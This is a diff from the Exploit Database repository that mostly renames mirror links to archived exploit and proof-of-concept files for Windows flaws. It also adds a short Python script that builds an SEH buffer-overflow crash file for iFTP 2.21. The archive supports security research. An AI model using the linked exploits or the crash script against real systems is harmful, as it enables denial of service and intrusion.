This vulnerability does not require any user authentication to exploit. It may be possible for remote users to cause a denial of service or execute arbitrary code on target hosts.
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20946.EXE
\ No newline at end of file
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/20946.exe
\ No newline at end of file
diff --git a/platforms/windows/dos/22680.txt b/platforms/windows/dos/22680.txt
index b0250c7a2..10942f4af 100755
--- a/platforms/windows/dos/22680.txt
+++ b/platforms/windows/dos/22680.txt
@@ -56,4 +56,4 @@ a heap-based buffer overflow via a specially crafted BMP image containing many
=============
http://protekresearchlab.com/exploits/PRL-2012-32.rle
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/PRL-2012-32.rle.tar.gz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22680.tar.gz (PRL-2012-32.rle.tar.gz)
diff --git a/platforms/windows/dos/22681.txt b/platforms/windows/dos/22681.txt
index 528dd791f..cd4f31559 100755
--- a/platforms/windows/dos/22681.txt
+++ b/platforms/windows/dos/22681.txt
@@ -55,5 +55,5 @@ heap-based buffer overflow via a specially crafted "ImageWidth" value.
=============
http://protekresearchlab.com/exploits/PRL-2012-31.tif
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/PRL-2012-31.tif.tar.gz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/22681.tif.tar.gz (PRL-2012-31.tif.tar.gz)
diff --git a/platforms/windows/dos/2922.txt b/platforms/windows/dos/2922.txt
index 6174f8dd4..66d7f22c5 100755
--- a/platforms/windows/dos/2922.txt
+++ b/platforms/windows/dos/2922.txt
@@ -27,6 +27,6 @@ bug hugs,
disco.
-poc: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12122006-djtest.doc
+poc: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2922.doc (12122006-djtest.doc)
# milw0rm.com [2006-12-12]
diff --git a/platforms/windows/dos/312.txt b/platforms/windows/dos/312.txt
index 7e351c1c1..60f297a53 100755
--- a/platforms/windows/dos/312.txt
+++ b/platforms/windows/dos/312.txt
@@ -20,7 +20,7 @@ Then, in this situation the only alternate is to kill the process.
--- [Proof of Concept] ---
Please download this file.
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/av_bomb_3.zip <--- For symantec.
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/312.zip (av_bomb_3.zip) <--- For symantec.
The file contains, 'EICAR Test String' burried in 49647 directories. This is just a RAW 'proof of concept'. A few 100kb's of compressed file could be crafted in a way... NAV will take hours or MIGHT even days to complete the scan causing 100% cup use in email gateways for hours. The compressed archive must not necessarily be a '.zip' to trigger this attack.
diff --git a/platforms/windows/dos/31360.txt b/platforms/windows/dos/31360.txt
index 527748023..3737d9051 100755
--- a/platforms/windows/dos/31360.txt
+++ b/platforms/windows/dos/31360.txt
@@ -9,5 +9,5 @@ An attacker may leverage these issues to execute arbitrary code in the context o
These issues affect MailEnable 3.13; other versions may also be vulnerable.
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31360_1.zip
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31360_2.pl
\ No newline at end of file
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31360-1.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/31360-2.pl
\ No newline at end of file
diff --git a/platforms/windows/dos/3399.txt b/platforms/windows/dos/3399.txt
index d70f4a170..c097731bf 100755
--- a/platforms/windows/dos/3399.txt
+++ b/platforms/windows/dos/3399.txt
@@ -74,7 +74,7 @@ void new_warning(int index, const char *fmt, ...) {
===========
http://aluigi.org/poc/netrekfs.zip
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/03022007-netrekfs.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3399.zip (03022007-netrekfs.zip)
#######################################################################
diff --git a/platforms/windows/dos/3419.txt b/platforms/windows/dos/3419.txt
index b57fd7ad3..05896e380 100755
--- a/platforms/windows/dos/3419.txt
+++ b/platforms/windows/dos/3419.txt
@@ -19,6 +19,6 @@
* Coded by Marsu *
\*****************************************************************************/
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/03062007-Explorer_Crasher.tar
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3419.tar (03062007-Explorer_Crasher.tar)
# milw0rm.com [2007-03-06]
diff --git a/platforms/windows/dos/3690.txt b/platforms/windows/dos/3690.txt
index 65a79a6a2..41df29480 100755
--- a/platforms/windows/dos/3690.txt
+++ b/platforms/windows/dos/3690.txt
@@ -26,7 +26,7 @@ file613-1.doc - Word 2007 CPU exhaustion DOS + ding - CPU shoots up to 100 %, a
These files can be found at http://www.offensive-security.com/0day/0day.tar.gz
-backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/04092007-0day.tar.gz
+backup: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3690.tar.gz (04092007-0day.tar.gz)
Be safe,
diff --git a/platforms/windows/dos/3693.txt b/platforms/windows/dos/3693.txt
index f86992a78..656751d3e 100755
--- a/platforms/windows/dos/3693.txt
+++ b/platforms/windows/dos/3693.txt
@@ -1,5 +1,5 @@
MS Windows .HLP File Local HEAP Overflow PoC 0day
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/04092007-evil1.hlp.tgz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3693.hlp.tgz (04092007-evil1.hlp.tgz)
# milw0rm.com [2007-04-09]
diff --git a/platforms/windows/dos/37014.py b/platforms/windows/dos/37014.py
new file mode 100755
index 000000000..5ed7e2f49
--- /dev/null
+++ b/platforms/windows/dos/37014.py
@@ -0,0 +1,25 @@
+#!/usr/bin/python
+###########################################################################################
+#Exploit Title:iFTP 2.21 Buffer OverFlow Crash PoC
+#Author: dogo h@ck
+#Date Discovered : 12-5-2015
+#Vendor Homepage: http://www.memecode.com/iftp.php
+#Software Link: http://www.memecode.com/data/iftp-win32-v2.21.exe
+#Version: 2.21
+#Tested on : Windows XP Sp3
+###########################################################################################
+#Crash : Go to Connect > Host Address > Post it
+#Bad Characters (\x00\x09\x0a\x0d\x80 and all from \x80 To \xFF I know It's FU&^% :( )
+############################################################################################
+
+buffer = "A"*1865
+buffer +="BBBB" #Pointer to next SEH record
+buffer +="CCCC" #SE handler
+buffer +="D"*500
+file = "buffer.txt"
+
+f = open(file, "w")
+
+f.write(buffer)
+
+f.close()
diff --git a/platforms/windows/dos/4044.txt b/platforms/windows/dos/4044.txt
index 5f50f097c..4f102b7d0 100755
--- a/platforms/windows/dos/4044.txt
+++ b/platforms/windows/dos/4044.txt
@@ -5,6 +5,6 @@
####################################
highsecu.ico - Microsoft GDI+ Integer division by zero flaw handling .ICO files
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/06072007-CVE-2007-2237.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4044.zip (06072007-CVE-2007-2237.zip)
# milw0rm.com [2007-06-07]
diff --git a/platforms/windows/dos/4121.txt b/platforms/windows/dos/4121.txt
index 3e74715f1..160cb3842 100755
--- a/platforms/windows/dos/4121.txt
+++ b/platforms/windows/dos/4121.txt
@@ -4,6 +4,6 @@ http://www.ph4nt0m.org
Tested on: Full Patched Excel 2003 Sp2, CN
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/06272007-2670.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4121.zip (06272007-2670.zip)
# milw0rm.com [2007-06-27]
diff --git a/platforms/windows/dos/4335.txt b/platforms/windows/dos/4335.txt
index c363d1340..3a0be0d74 100755
--- a/platforms/windows/dos/4335.txt
+++ b/platforms/windows/dos/4335.txt
@@ -5,6 +5,6 @@ Yahoo! Messenger 8.1.0.413 (webcam) Remote Crash Exploit
3.when the otherside accept the invatation , inject the dll to local yahoo! messenger 8.1.0.413 's process.
4 . the otherside's yahoo! messenger will be crashed.
-Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/08292007-expyahoo.rar
+Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4335.rar (08292007-expyahoo.rar)
# milw0rm.com [2007-08-29]
diff --git a/platforms/windows/dos/4375.txt b/platforms/windows/dos/4375.txt
index ecd4a2022..df9d7cddb 100755
--- a/platforms/windows/dos/4375.txt
+++ b/platforms/windows/dos/4375.txt
@@ -1,5 +1,5 @@
BaoFeng2 Mps.dll Activex Multiple Remote Buffer Overflow PoC
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/09082007-storm.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4375.zip (09082007-storm.zip)
# milw0rm.com [2007-09-08]
diff --git a/platforms/windows/dos/5327.txt b/platforms/windows/dos/5327.txt
index bb45542a1..4660fb577 100755
--- a/platforms/windows/dos/5327.txt
+++ b/platforms/windows/dos/5327.txt
@@ -8,6 +8,6 @@ Download the file anywhere excluding on desktop and try to browse it with the Wi
- Website - http://iron-team.com/
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-Iron.Team.hack.the.planet.doc
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5327.doc (2008-Iron.Team.hack.the.planet.doc)
# milw0rm.com [2008-03-31]
diff --git a/platforms/windows/dos/5687.txt b/platforms/windows/dos/5687.txt
index 6a3bfe5b3..c439086dc 100755
--- a/platforms/windows/dos/5687.txt
+++ b/platforms/windows/dos/5687.txt
@@ -4,6 +4,6 @@ the reader deadly crash when a malformed Pdf file is opened:
greetz to : Deimos, benjilenoob, Berga , http://spiritofhack.net/
-Poc : https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-HI2.pdf
+Poc : https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5687.pdf (2008-HI2.pdf)
# milw0rm.com [2008-05-29]
diff --git a/platforms/windows/dos/6330.txt b/platforms/windows/dos/6330.txt
index c82e2a184..662eab9a1 100755
--- a/platforms/windows/dos/6330.txt
+++ b/platforms/windows/dos/6330.txt
@@ -21,6 +21,6 @@ and causes Internet explorer to close silently.
This is work in progress , i am still trying to make it run arbitary code.
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-EMF_DOS.rar
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6330.rar (2008-EMF_DOS.rar)
# milw0rm.com [2008-08-29]
diff --git a/platforms/windows/dos/6560.txt b/platforms/windows/dos/6560.txt
index f0c42ed96..83c5b4483 100755
--- a/platforms/windows/dos/6560.txt
+++ b/platforms/windows/dos/6560.txt
@@ -1,6 +1,6 @@
MS Windows Wordpad .doc File Local Denial of Service PoC
author: securfrog
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-crash.doc.rar
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6560.rar (2008-crash.doc.rar)
# milw0rm.com [2008-09-25]
diff --git a/platforms/windows/dos/6565.txt b/platforms/windows/dos/6565.txt
index e08d0ed79..2b7014f4c 100755
--- a/platforms/windows/dos/6565.txt
+++ b/platforms/windows/dos/6565.txt
@@ -20,6 +20,6 @@ By: Aodrulez,
Email: f3arm3d3ar@gmail.com
------------------------------------------------------------------
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-test7.rar
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6565.rar (2008-test7.rar)
# milw0rm.com [2008-09-25]
diff --git a/platforms/windows/dos/6616.txt b/platforms/windows/dos/6616.txt
index 74fa78c8c..de8f6b35a 100755
--- a/platforms/windows/dos/6616.txt
+++ b/platforms/windows/dos/6616.txt
@@ -10,6 +10,6 @@ EBP 0007E358
Access Violation [FFFFFFFF]
---|
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-ExplorerDOS.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6616.zip (2008-ExplorerDOS.zip)
# milw0rm.com [2008-09-28]
diff --git a/platforms/windows/dos/6658.txt b/platforms/windows/dos/6658.txt
index a930be4c0..10ca75345 100755
--- a/platforms/windows/dos/6658.txt
+++ b/platforms/windows/dos/6658.txt
@@ -25,6 +25,6 @@ http://www.zeroscience.org
------------------------------------------------------------------------------------------------------------------------------
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-vba32_poc.rar
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6658.rar (2008-vba32_poc.rar)
# milw0rm.com [2008-10-03]
diff --git a/platforms/windows/dos/6732.txt b/platforms/windows/dos/6732.txt
index e5fa2de56..10d2cbd5a 100755
--- a/platforms/windows/dos/6732.txt
+++ b/platforms/windows/dos/6732.txt
@@ -12,6 +12,6 @@ Causes Windows explorer and Internet explorer to crash.
You can run arbitary code.
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-emf_MS08-046.rar
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6732.rar (2008-emf_MS08-046.rar)
# milw0rm.com [2008-10-12]
diff --git a/platforms/windows/dos/677.txt b/platforms/windows/dos/677.txt
index 7fd07cd4c..2f9f8c5be 100755
--- a/platforms/windows/dos/677.txt
+++ b/platforms/windows/dos/677.txt
@@ -20,7 +20,7 @@ Solutions:
There was no response.
Exploit:
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/c_skin.grs
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/677.grs (c_skin.grs)
When you copy or click this link, getright automaticly download and try to load
crafted skin and will trigger buffer overflow
diff --git a/platforms/windows/dos/6824.txt b/platforms/windows/dos/6824.txt
index 20d9b6235..3ac8bfdcb 100755
--- a/platforms/windows/dos/6824.txt
+++ b/platforms/windows/dos/6824.txt
@@ -21,6 +21,6 @@ You need a slash on the stack prior to the input buffer.
So play around a bit, you'll get it working reliably...
poc:
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-ms08-067.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6824.zip (2008-ms08-067.zip)
# milw0rm.com [2008-10-23]
diff --git a/platforms/windows/dos/7178.txt b/platforms/windows/dos/7178.txt
index 4beca82ed..933d82d4c 100755
--- a/platforms/windows/dos/7178.txt
+++ b/platforms/windows/dos/7178.txt
@@ -19,6 +19,6 @@ ESI 04354E18
EDI 04352100
EIP 775781CB ntdll.775781CB
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-BitDefenderDOS.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/7178.zip (2008-BitDefenderDOS.zip)
# milw0rm.com [2008-11-20]
diff --git a/platforms/windows/dos/770.txt b/platforms/windows/dos/770.txt
index 912f4a953..84cbd6311 100755
--- a/platforms/windows/dos/770.txt
+++ b/platforms/windows/dos/770.txt
@@ -15,7 +15,7 @@ will can cause the remote system to crash.
--Uncompleted qtif image file header
http://www.atmacasoft.com/exp/vuln.qtif.zip
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/vuln.qtif
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/770.qtif (vuln.qtif)
00000000 0000 005E 6964 7363 0000 0056 6A70 6567 0000 0000 0000 0000 0000 0000 ...^idsc...Vjpeg............
0000001C 6170 706C 0000 0000 0000 0200 0100 016D 0048 0000 0048 0000 0000 724D appl...........m.H...H....rM
diff --git a/platforms/windows/dos/8090.txt b/platforms/windows/dos/8090.txt
index 55c92ad77..524534b56 100755
--- a/platforms/windows/dos/8090.txt
+++ b/platforms/windows/dos/8090.txt
@@ -1,5 +1,5 @@
causes an exception at 41414141
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-41414141.pdf
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/8090.pdf (2009-41414141.pdf)
# milw0rm.com [2009-02-23]
diff --git a/platforms/windows/dos/8281.txt b/platforms/windows/dos/8281.txt
index cf5459322..b1fda8566 100755
--- a/platforms/windows/dos/8281.txt
+++ b/platforms/windows/dos/8281.txt
@@ -4,6 +4,6 @@ Write up by redsand@blacksecurity.org : http://bl4cksecurity.blogspot.com/2009/0
Credits to mIKEJONES for providing the .EMF Crash
down: http://www.blacksecurity.org/voltage-exploit.emf
-back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-voltage-exploit.emf
+back: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/8281.emf (2009-voltage-exploit.emf)
# milw0rm.com [2009-03-24]
diff --git a/platforms/windows/dos/8306.txt b/platforms/windows/dos/8306.txt
index d6b6280ca..46f89c24e 100755
--- a/platforms/windows/dos/8306.txt
+++ b/platforms/windows/dos/8306.txt
@@ -1,5 +1,5 @@
Firefox memory corruption PoC/DoS in XUL (XML) parser
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-Firefox-XUL-0day-PoC.rar
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/8306.rar (2009-Firefox-XUL-0day-PoC.rar)
# milw0rm.com [2009-03-30]
diff --git a/platforms/windows/dos/8837.txt b/platforms/windows/dos/8837.txt
index 0d6fd2937..9d6c2fcd9 100755
--- a/platforms/windows/dos/8837.txt
+++ b/platforms/windows/dos/8837.txt
@@ -56,7 +56,7 @@
################################################################################
>>> *** PoC: http://www.zeroscience.org/codes/aimp2_evil.mp3 ~2.92 MB <<<
->>> *** PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-aimp2_evil.mp3 ~2.92 MB <<<
+>>> *** PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/8837.mp3 (2009-aimp2_evil.mp3) ~2.92 MB <<<
################################################################################
diff --git a/platforms/windows/dos/9167.txt b/platforms/windows/dos/9167.txt
index 6c9c3bf6f..99094cac2 100755
--- a/platforms/windows/dos/9167.txt
+++ b/platforms/windows/dos/9167.txt
@@ -22,8 +22,8 @@ cccccccc ??
==
-*** Proof Of Concept: http://zeroscience.org/codes/aimp2_evil.mp3
- https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-aimp2_evil.mp3
+*** Proof Of Concept: http://zeroscience.org/codes/aimp2_evil.mp3 http://www.zeroscience.mk/old/codes/aimp2_evil.mp3
+ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9167.mp3 (2009-aimp2_evil.mp3)
** Note: The same PoC used in:
- http://secunia.com/advisories/35305/
diff --git a/platforms/windows/dos/9169.txt b/platforms/windows/dos/9169.txt
index f50bef53d..4670fa9c0 100755
--- a/platforms/windows/dos/9169.txt
+++ b/platforms/windows/dos/9169.txt
@@ -75,7 +75,7 @@
# #
# - 1. http://zeroscience.org/codes/aimp2_evil.mp3 #
# #
- # - 2. https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-aimp2_evil.mp3 (mirror) #
+ # - 2. https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9167.mp3 (2009-aimp2_evil.mp3) (mirror) #
# #
# - 3. http://securityreason.com/download/11/13 (mirror) #
# #
diff --git a/platforms/windows/dos/9170.txt b/platforms/windows/dos/9170.txt
index 454b68184..3afafc36c 100755
--- a/platforms/windows/dos/9170.txt
+++ b/platforms/windows/dos/9170.txt
@@ -44,7 +44,7 @@ http://www.zeroscience.org/
PoC: 1. http://zeroscience.org/codes/aimp2_evil.mp3
- 2. https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-aimp2_evil.mp3
+ 2. https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9167.mp3 (2009-aimp2_evil.mp3)
3. http://securityreason.com/download/11/13
# milw0rm.com [2009-07-16]
diff --git a/platforms/windows/dos/9417.txt b/platforms/windows/dos/9417.txt
index e60e16c58..318ed3446 100755
--- a/platforms/windows/dos/9417.txt
+++ b/platforms/windows/dos/9417.txt
@@ -1,6 +1,6 @@
MS Windows 2003 (EOT File) BSOD Crash Exploit
author: webDEViL
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-wwbsod.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/9417.zip (2009-wwbsod.zip)
# milw0rm.com [2009-08-11]
diff --git a/platforms/windows/local/11199.txt b/platforms/windows/local/11199.txt
index fc3204678..0a2b3bac9 100755
--- a/platforms/windows/local/11199.txt
+++ b/platforms/windows/local/11199.txt
@@ -1,4 +1,4 @@
-Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/KiTrap0D.zip
+Exploit-DB Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11199.zip (KiTrap0D.zip)
Microsoft Windows NT #GP Trap Handler Allows Users to Switch Kernel Stack
-------------------------------------------------------------------------
diff --git a/platforms/windows/local/14403.txt b/platforms/windows/local/14403.txt
index daa0ba598..6b21c6fd0 100755
--- a/platforms/windows/local/14403.txt
+++ b/platforms/windows/local/14403.txt
@@ -5,7 +5,7 @@ From: http://www.ivanlef0u.tuxfamily.org/?p=411
3. Look at your logs.
http://ivanlef0u.nibbles.fr/repo/suckme.rar
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/suckme.rar
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14403.rar (suckme.rar)
Tested under XP SP3.
diff --git a/platforms/windows/local/14610.txt b/platforms/windows/local/14610.txt
index 95ca1f4e4..11cc2306b 100755
--- a/platforms/windows/local/14610.txt
+++ b/platforms/windows/local/14610.txt
@@ -5,4 +5,4 @@ Microsoft Windows is prone to a local privilege-escalation vulnerability.
An attacker can exploit this issue to execute arbitrary code with SYSTEM-level privileges. Successful exploits will result in the complete compromise of affected computers.
Code:
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/Chimichurri-CVE-2010-2554.zip
\ No newline at end of file
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14610.zip (Chimichurri-CVE-2010-2554.zip)
\ No newline at end of file
diff --git a/platforms/windows/local/14748.txt b/platforms/windows/local/14748.txt
index c9729242b..97b9a93a6 100755
--- a/platforms/windows/local/14748.txt
+++ b/platforms/windows/local/14748.txt
@@ -27,6 +27,6 @@ utorrent.exe directory, the payload will be executed with users' credentials.
-rpcrtremote.dll
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/Dr_IDE.bind.dll.tar.gz
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14748.tar.gz (Dr_IDE.bind.dll.tar.gz)
#[pocoftheday.blogspot.com]
\ No newline at end of file
diff --git a/platforms/windows/local/14765.c b/platforms/windows/local/14765.c
index 5c174ba0e..93bac51f5 100755
--- a/platforms/windows/local/14765.c
+++ b/platforms/windows/local/14765.c
@@ -26,4 +26,4 @@ int evil()
return 0;
}
-// POC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/mpc-poc.zip
+// POC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14765.zip (mpc-poc.zip)
diff --git a/platforms/windows/local/14769.c b/platforms/windows/local/14769.c
index e48ba8820..6ce0f7c4a 100755
--- a/platforms/windows/local/14769.c
+++ b/platforms/windows/local/14769.c
@@ -26,4 +26,4 @@ int evil()
return 0;
}
-// POC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/nvidia-poc.rar
+// POC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14769.rar (nvidia-poc.rar)
diff --git a/platforms/windows/local/14944.py b/platforms/windows/local/14944.py
index e7ed00827..c624ff757 100755
--- a/platforms/windows/local/14944.py
+++ b/platforms/windows/local/14944.py
@@ -7,7 +7,7 @@
|_| |_|\____/_/ \_\____/|____/
http://www.exploit-db.com/moaub-8-microsoft-office-visio-dxf-file-stack-overflow/
- https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/moaub-8-exploit.zip
+ https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14944.zip (moaub-8-exploit.zip)
'''
'''
diff --git a/platforms/windows/local/14966.py b/platforms/windows/local/14966.py
index 39c27ebda..4f80bc512 100755
--- a/platforms/windows/local/14966.py
+++ b/platforms/windows/local/14966.py
@@ -7,7 +7,7 @@
|_| |_|\____/_/ \_\____/|____/
http://www.exploit-db.com/moaub-10-excel-rtd-memory-corruption/
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/moaub-10-exploit.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14966.zip (moaub-10-exploit.zip)
'''
'''
diff --git a/platforms/windows/local/14982.py b/platforms/windows/local/14982.py
index 79e6c0fac..1fd79a351 100755
--- a/platforms/windows/local/14982.py
+++ b/platforms/windows/local/14982.py
@@ -7,7 +7,7 @@
|_| |_|\____/_/ \_\____/|____/
http://www.exploit-db.com/moaub12-adobe-acrobat-and-reader-pushstring-memory-corruption/
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/moaub-12-exploit.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14982.zip (moaub-12-exploit.zip)
'''
'''
diff --git a/platforms/windows/local/15094.py b/platforms/windows/local/15094.py
index aff57e5ab..e4e5f9a15 100755
--- a/platforms/windows/local/15094.py
+++ b/platforms/windows/local/15094.py
@@ -7,7 +7,7 @@
|_| |_|\____/_/ \_\____/|____/
http://www.exploit-db.com/moaub-24-microsoft-excel-obj-record-stack-overflow/
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/moaub-24-excel-exploit.zip
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15094.zip (moaub-24-excel-exploit.zip)
'''
'''
diff --git a/platforms/windows/local/15609.txt b/platforms/windows/local/15609.txt
index 6f858ecc6..c71ab4e88 100755
--- a/platforms/windows/local/15609.txt
+++ b/platforms/windows/local/15609.txt
@@ -3,7 +3,7 @@ A Design Flaw in Windows Kernel API can Lead to privilege escalation.
Mirror of Original Post: http://www.exploit-db.com/bypassing-uac-with-user-privilege-under-windows-vista7-mirror/
PoC: http://www.codeproject.com/KB/vista-security/uac.aspx (not available)
-mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/uacpoc.zip
+mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15609.zip (uacpoc.zip)
After running this PoC, just type “whoami” in command prompt to see the escalated user credentials.
Points of Interest
diff --git a/platforms/windows/local/15624.txt b/platforms/windows/local/15624.txt
index 82dcba9e1..510e6592a 100755
--- a/platforms/windows/local/15624.txt
+++ b/platforms/windows/local/15624.txt
@@ -79,4 +79,4 @@ and force execution with kernel priviligies(cpl==0).
Exploit code is in CAInternetSecuritySuite2010.zip file.
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/CAInternetSecuritySuite2010.zip
\ No newline at end of file
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15624.zip (CAInternetSecuritySuite2010.zip)
\ No newline at end of file
diff --git a/platforms/windows/local/15696.txt b/platforms/windows/local/15696.txt
index c45f078fd..ac6eb14a3 100755
--- a/platforms/windows/local/15696.txt
+++ b/platforms/windows/local/15696.txt
@@ -58,5 +58,5 @@ FhUAn0y6pBrAJXLcLiEfINR5hT4MfL52
=zMAG
-----END PGP SIGNATURE-----
-Exploit: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/Off_with_her_head.a2w
+Exploit: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/15696.a2w (Off_with_her_head.a2w)
diff --git a/platforms/windows/local/16024.txt b/platforms/windows/local/16024.txt
index 68e004a2c..787c9dc21 100755
--- a/platforms/windows/local/16024.txt
+++ b/platforms/windows/local/16024.txt
@@ -76,7 +76,7 @@ considered valid.
DoS:
http://aluigi.org/poc/fxscover_1.cov
-https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/16024_fxscover_1.cov
+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/16024-fxscover_1.cov
Bind Shell:
https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/fxscover_1_bind28876.zip
diff --git a/platforms/windows/local/17473.txt b/platforms/windows/local/17473.txt
index bffb7c763..eb9199cfb 100755
--- a/platforms/windows/local/17473.txt
+++ b/platforms/windows/local/17473.txt
@@ -16,5 +16,5 @@
# also check here for The Persian docs of this methods and more :
http://www.0days.ir/article/
-Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/cve-2011-0611_exploit.pdf
+Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17473.pdf (cve-2011-0611_exploit.pdf)
diff --git a/platforms/windows/local/17474.txt b/platforms/windows/local/17474.txt
index b4915e65e..da19316a4 100755
--- a/platforms/windows/local/17474.txt
+++ b/platforms/windows/local/17474.txt
@@ -149,4 +149,4 @@ stores in stack :D
-Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/cve-2011-3333_exploit.doc
+Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17474.doc (cve-2011-3333_exploit.doc)
diff --git a/platforms/windows/local/17488.txt b/platforms/windows/local/17488.txt
index 287e33cfd..3774052ee 100755
--- a/platforms/windows/local/17488.txt
+++ b/platforms/windows/local/17488.txt
@@ -17,4 +17,4 @@
